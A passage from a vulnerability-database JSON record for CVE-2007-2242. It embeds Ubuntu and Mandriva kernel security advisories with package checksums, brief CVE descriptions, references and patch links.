4fecae0ee0d1ad474f2e9b440bb50c76\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:  2331766 fe68e08970accf65a0d5106e639f87ea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   233858 fbd8ae40c9e092e8f6ef3ef89b5fa034\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   214704 d1c180af3cee5d80a0c6e045ab7cca66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    12696 46e06747d49b64cce513633b79b00111\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    13316 61b3b6a0c84695365661f6ea8697d7f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    83240 0dc567f9c97d271aebe807ec017454a4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    97162 85d44740ed633723dac4810b60a4941a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    71160 cc8f7ddf940a1dc28540b951d600494a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    84188 7c3bcdb3c9f430a83fe217c3f608e987\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:     6346 501b4f81087de783cb047beccd821e16\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:     6890 3fc743c702743c64626afb149611772e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    57002 13f8831879808c97eff7bd30fac4ffd9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    69202 ab86b925064cd257a09f4c0b18ecfcc5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   128618 15deac4a700effc177eb788d2ab7a483\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   156242 50b0643e2ed32e9155272f20acd92379\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   109764 5e9925bddb96efdb84a8c719c4815495\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   133040 aecf93580b62a1b25e346595c0a232e0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    86612 20f2a685e18d0ad56f8d34d0343d921e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    94826 01743e049cfef3843e781189aa3d1497\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:  1511478 4660787ea1a93756c0c0dd869c221023\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:  1521588 d70e9fa47808f171ac95c169c6e29177\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   101306 c55cc8f4ff26c9e82f2f3ebf3b81388c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   115560 37bdd2239d7c633267fe0441ed93f988\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    12206 36f00173ddd7427b7540f81a56503c1d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    14294 c4c8a72bc8944313aac2200cc04e97ae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    84678 1dd8aa1c4555a8459dae275aaac03aa9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    87956 19bca79086e039ba65e5a72d8d359f75\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    37278 c2bd19dca9c56862aa93460ccb8751ae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    40252 1483517a7607b74fa6fcbcc22ab5fdd6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   139996 26c86dc67c3a654d8f1ec87ffa2fca28\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   161492 ebe28ec47f8f488e2235d7913a02d046\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    49996 ec1ed33de95bdb1c37aa9a9bd34bd69f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:    54876 7e9284172eac7124fa71724d66d1b636\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   308218 7f86cf616bb7ab1db75697f678ea6acd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb\n      Size/MD5:   330232 403f447d858dbe8c55c33563b7cf1eb5\n\n  sparc architecture (Sun SPARC/UltraSPARC)\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:    50734 bb2efbe1b281982ecde5580ab6fe3b50\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:     2388 5b3124294cced1f9c01bef0f54b3e6be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:    40670 d5285a397b2cfbfa99b5c31547a1630d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:   112228 228400863e74dde11225e875b61afc14\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:    41754 fc6f0b3e063713229519155b8084a67d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:   105100 b9ea17239e0badbbebcccd6fbc32e802\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:     6860 3fb7358ac5a7381d52295f06bc623ab7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:   147570 fa000eaaca4c2d10302b5a0d2bc69cb4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:  1840714 1842940403b8e2e931a44eb01359bfe6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64-smp_2.6.17.1-12.39_sparc.deb\n      Size/MD5:   812940 f9a5e0636476d16cec2229e413043766\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64_2.6.17.1-12.39_sparc.deb\n      Size/MD5:   808176 2b5aebefa48c28a7c5d4209aab7033cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.39_sparc.deb\n      Size/MD5:  7424164 c74ba68d7311108b74006d980dd10dde\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64-smp_2.6.17.1-12.39_sparc.deb\n      Size/MD5: 15626704 1e4b8d0931b65f611d65703b0ec0f36e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64_2.6.17.1-12.39_sparc.deb\n      Size/MD5: 15290014 3a50dbd38c7755fe3ff318b060cc1220\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64-smp_2.6.17.1-12.39_sparc.deb\n      Size/MD5:  2172050 ba0f7981b554898adfc969fb69ccf64b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64_2.6.17.1-12.39_sparc.deb\n      Size/MD5:  2086206 09f393da6d5146f7dce916f54f3d7691\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.39_sparc.deb\n      Size/MD5:  1813150 e3b3905635f967a48624137edcdbb27b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:     7404 ea3a9c628a0abb24538ddbe64f19492e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:   263986 2619285b2ab85918a65c1e23aac157b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:   229210 dc1d9b2fd9a2bb983a928a1c901232cf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:  1048450 a8621025ef6733f91c55ac4faca6e969\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:  1922014 0d453425af2422b8cdbf51befa1549c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:     9916 70e259e5700fbdb85527cded08f64ed6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:    40360 789d5ef17ef193756a42a6b9fc0aa33d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:     8718 501c7f5bdcbfa3d4cee868f09173ccc3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:    59388 36b36d79b6c3ac4ae081211a23ceb9bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:   162874 6a197706de5114d0fab66cae0bd63ffc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:    66650 89d73eaf9ae8e6cf12ef9eb419bcec66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:   855816 f89556200a52867a2c1a02d2ca43ac99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:    51828 f226534e06e281c35a9c46e7fc163f2e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:    38424 9896fecebac71aa51c4770188e89a9b2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.39_sparc.udeb\n      Size/MD5:   283108 4ef6014b80d06c5db64affc1b671ee8a\n\n. \n\nDetails follow:\n\nA buffer overflow was discovered in the Moxa serial driver.  A local user could manipulate this\nto send signals to processes they would not normally have access to. \n \n The nf_conntrack function in netfilter did not set nfctinfo during\n reassembly of fragmented packets, which left the default value as\n IP_CT_ESTABLISHED and could allow remote attackers to bypass certain\n rulesets using IPv6 fragments (CVE-2007-1497). \n \n A typo in the Linux kernel caused RTA_MAX to be used as an array size\n instead of RTN_MAX, which lead to an out of bounds access by certain\n functions (CVE-2007-2172). \n \n A stack-based buffer overflow in the random number generator could\n allow local root users to cause a denial of service or gain privileges\n by setting the default wakeup threshold to a value greater than the\n output pool size (CVE-2007-3105). \n \n The Linux kernel allowed local users to send arbitrary signals\n to a child process that is running at higher privileges by\n causing a setuid-root parent process to die which delivered an\n attacker-controlled parent process death signal (PR_SET_PDEATHSIG)\n (CVE-2007-3848). \n \n The IA32 system call emulation functionality, when running on the\n x86_64 architecture, did not zero extend the eax register after the\n 32bit entry path to ptrace is used, which could allow local users to\n gain privileges by triggering an out-of-bounds access to the system\n call table using the %RAX register (CVE-2007-4573). \n \n In addition to these security fixes, other fixes have been included\n such as:\n \n   - The 3w-9xxx module was updated to version 9.4.1.2, adding support\n   for 9650SE\n   - Fixed the build of e1000-ng\n   - Added NIC support for MCP55\n   - Added LSI Logic MegaRAID SAS 8300XLP support\n \n To update your kernel, please follow the directions located at:\n \n   http://www.mandriva.com/en/security/kernelupdate\n _______________________________________________________________________\n\n References:\n \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7203\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1497\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2172\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2242\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2453\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2525\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2875\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2876\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3105\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3513\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3848\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4308\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4573\n _______________________________________________________________________\n \n Updated Packages:\n \n Corporate 4.0:\n 3657c208eeb3c079d9ff0a4ca55a9b03  corporate/4.0/i586/kernel-2.6.12.32mdk-1-1mdk.i586.rpm\n 0cd8fd1c504f3365fe503c4fd627b6ea  corporate/4.0/i586/kernel-BOOT-2.6.12.32mdk-1-1mdk.i586.rpm\n fbabe3497810452a0052bc67a5fb4f29  corporate/4.0/i586/kernel-doc-2.6.12.32mdk-1-1mdk.i586.rpm\n 02edfc1bbb2bd826c4a9152d670cc2cc  corporate/4.0/i586/kernel-i586-up-1GB-2.6.12.32mdk-1-1mdk.i586.rpm\n 88b0876de92beff866bb91ba57be0a70  corporate/4.0/i586/kernel-i686-up-4GB-2.6.12.32mdk-1-1mdk.i586.rpm\n e813926dc184e911deb62a1e34cff8ed  corporate/4.0/i586/kernel-smp-2.6.12.32mdk-1-1mdk.i586.rpm\n a8011ebbe529551463f87cc22f3da22f  corporate/4.0/i586/kernel-source-2.6.12.32mdk-1-1mdk.i586.rpm\n 813ba955a1e9b5ff9834aeebbe477a93  corporate/4.0/i586/kernel-source-stripped-2.6.12.32mdk-1-1mdk.i586.rpm\n be08ad30fbc3988f654c1532e73fc330  corporate/4.0/i586/kernel-xbox-2.6.12.32mdk-1-1mdk.i586.rpm\n 5894ac0216cf38203d2002a19db70c15  corporate/4.0/i586/kernel-xen0-2.6.12.32mdk-1-1mdk.i586.rpm\n 62d5b93083df571edbf8785bc754dd6e  corporate/4.0/i586/kernel-xenU-2.6.12.32mdk-1-1mdk.i586.rpm \n 423fe3296a56ff845fd643890663cdee  corporate/4.0/SRPMS/kernel-2.6.12.32mdk-1-1mdk.src.rpm\n\n Corporate 4.0/X86_64:\n a51bd78ce00e65f7521625c8c67605f0  corporate/4.0/x86_64/kernel-2.6.12.32mdk-1-1mdk.x86_64.rpm\n 8d407ed81be714537c2c957918cedfed  corporate/4.0/x86_64/kernel-BOOT-2.6.12.32mdk-1-1mdk.x86_64.rpm\n 730c0bae9b443e5f9d8cb3c8a3486488  corporate/4.0/x86_64/kernel-doc-2.6.12.32mdk-1-1mdk.x86_64.rpm\n 06391bd475945e8a8b76dcb33989fc83  corporate/4.0/x86_64/kernel-smp-2.6.12.32mdk-1-1mdk.x86_64.rpm\n bc9c9a881f18b5c2f892684aaeee84cf  corporate/4.0/x86_64/kernel-source-2.6.12.32mdk-1-1mdk.x86_64.rpm\n b0240b751985babe1aabda9c9e231a92  corporate/4.0/x86_64/kernel-source-stripped-2.6.12.32mdk-1-1mdk.x86_64.rpm\n b1b4750de7daf9cb12ed0057a8851f32  corporate/4.0/x86_64/kernel-xen0-2.6.12.32mdk-1-1mdk.x86_64.rpm\n 915a8eb87a9fc0c0deab5e696f27c59b  corporate/4.0/x86_64/kernel-xenU-2.6.12.32mdk-1-1mdk.x86_64.rpm \n 423fe3296a56ff845fd643890663cdee  corporate/4.0/SRPMS/kernel-2.6.12.32mdk-1-1mdk.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.7 (GNU/Linux)\n\niD8DBQFHE+PimqjQ0CJFipgRAprEAKCoEfNhoDZrxQng2IYqYumR/3zVvACeOoJQ\n51R6ymKyEZNBb9xnSWE/E64=\n=QWz7\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-2242"
      },
      {
        "db": "CERT/CC",
        "id": "VU#267289"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000387"
      },
      {
        "db": "BID",
        "id": "23615"
      },
      {
        "db": "PACKETSTORM",
        "id": "60879"
      },
      {
        "db": "PACKETSTORM",
        "id": "56342"
      },
      {
        "db": "PACKETSTORM",
        "id": "57864"
      },
      {
        "db": "PACKETSTORM",
        "id": "58999"
      },
      {
        "db": "PACKETSTORM",
        "id": "58920"
      },
      {
        "db": "PACKETSTORM",
        "id": "60130"
      }
    ],
    "trust": 3.15
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#267289",
        "trust": 3.5
      },
      {
        "db": "NVD",
        "id": "CVE-2007-2242",
        "trust": 3.3
      },
      {
        "db": "SECUNIA",
        "id": "25068",
        "trust": 3.2
      },
      {
        "db": "BID",
        "id": "23615",
        "trust": 2.7
      },
      {
        "db": "SECUNIA",
        "id": "24978",
        "trust": 2.4
      },
      {
        "db": "SECUNIA",
        "id": "26703",
        "trust": 2.4
      },
      {
        "db": "SECUNIA",
        "id": "25033",
        "trust": 2.4
      },
      {
        "db": "SECUNIA",
        "id": "25770",
        "trust": 2.4
      },
      {
        "db": "VUPEN",
        "id": "ADV-2007-3050",
        "trust": 1.6
      },
      {
        "db": "VUPEN",
        "id": "ADV-2007-1563",
        "trust": 1.6
      },
      {
        "db": "VUPEN",
        "id": "ADV-2007-2270",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "25083",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "26133",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "26664",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "25288",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "26651",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "28806",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "25691",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "26620",
        "trust": 1.6
      },
      {
        "db": "SECTRACK",
        "id": "1017949",
        "trust": 1.6
      },
      {
        "db": "XF",
        "id": "33851",
        "trust": 1.4
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000387",
        "trust": 0.8
      },
      {
        "db": "MANDRIVA",
        "id": "MDKSA-2007:171",
        "trust": 0.6
      },
      {
        "db": "MANDRIVA",
        "id": "MDKSA-2007:196",
        "trust": 0.6
      },
      {
        "db": "MANDRIVA",
        "id": "MDKSA-2007:216",
        "trust": 0.6
      },
      {
        "db": "OPENBSD",
        "id": "[4.0] 20070423 012: SECURITY FIX: APRIL 23, 2007",
        "trust": 0.6
      },
      {
        "db": "OPENBSD",
        "id": "[3.9] 20070423 022: SECURITY FIX: APRIL 23, 2007",
        "trust": 0.6
      },
      {
        "db": "UBUNTU",
        "id": "USN-508-1",
        "trust": 0.6
      },
      {
        "db": "UBUNTU",
        "id": "USN-486-1",
        "trust": 0.6
      },
      {
        "db": "BUGTRAQ",
        "id": "20070615 RPSA-2007-0124-1 KERNEL XEN",
        "trust": 0.6
      },
      {
        "db": "BUGTRAQ",
        "id": "20070508 FLEA-2007-0016-1: KERNEL",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2007:0347",
        "trust": 0.6
      },
      {
        "db": "FREEBSD",
        "id": "FREEBSD-SA-07:03.IPV6",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "6",
        "trust": 0.6
      },
      {
        "db": "SUSE",
        "id": "SUSE-SA:2008:006",
        "trust": 0.6
      },
      {
        "db": "SUSE",
        "id": "SUSE-SA:2007:051",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200704-492",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "60879",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "56342",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "57864",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "58999",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "58920",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "60130",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#267289"
      },
      {
        "db": "BID",
        "id": "23615"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000387"
      },
      {
        "db": "PACKETSTORM",
        "id": "60879"
      },
      {
        "db": "PACKETSTORM",
        "id": "56342"
      },
      {
        "db": "PACKETSTORM",
        "id": "57864"
      },
      {
        "db": "PACKETSTORM",
        "id": "58999"
      },
      {
        "db": "PACKETSTORM",
        "id": "58920"
      },
      {
        "db": "PACKETSTORM",
        "id": "60130"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200704-492"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-2242"
      }
    ]
  },
  "id": "VAR-200704-0740",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.56666665
  },
  "last_update_date": "2024-07-23T19:54:14.554000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "cisco-sa-20070124-IOS-IPv6",
        "trust": 0.8,
        "url": "http://www.cisco.com/warp/public/707/cisco-sa-20070124-ios-ipv6.shtml"
      },
      {
        "title": "IPv6\u30d7\u30ed\u30c8\u30b3\u30eb\u306eType 0\u30eb\u30fc\u30c6\u30a3\u30f3\u30b0\u30d8\u30c3\u30c0\u306b\u95a2\u3059\u308b\u8106\u5f31\u6027\u306b\u3064\u3044\u3066",
        "trust": 0.8,
        "url": "http://www.furukawa.co.jp/fitelnet/topic/vulnera_20070614.html"
      },
      {
        "title": "FreeBSD-SA-07:03.ipv6",
        "trust": 0.8,
        "url": "http://security.freebsd.org/advisories/freebsd-sa-07:03.ipv6.asc"
      },
      {
        "title": "\u65e5\u7acb\u682a\u5f0f\u4f1a\u793e\u304b\u3089\u306e\u60c5\u5831",
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnvu%23267289/066287/index.html"
      },
      {
        "title": "ChangeLog-2.6.20.9",
        "trust": 0.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.20.9"
      },
      {
        "title": "ChangeLog-2.6.21",
        "trust": 0.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.21"
      },
      {
        "title": "NV07-001",
        "trust": 0.8,
        "url": "http://www.nec.co.jp/security-info/secinfo/nv07-001.html"
      },
      {
        "title": "022: SECURITY FIX: April 23, 2007",
        "trust": 0.8,
        "url": "http://openbsd.org/errata39.html#022_route6"
      },
      {
        "title": "012: SECURITY FIX: April 23, 2007",
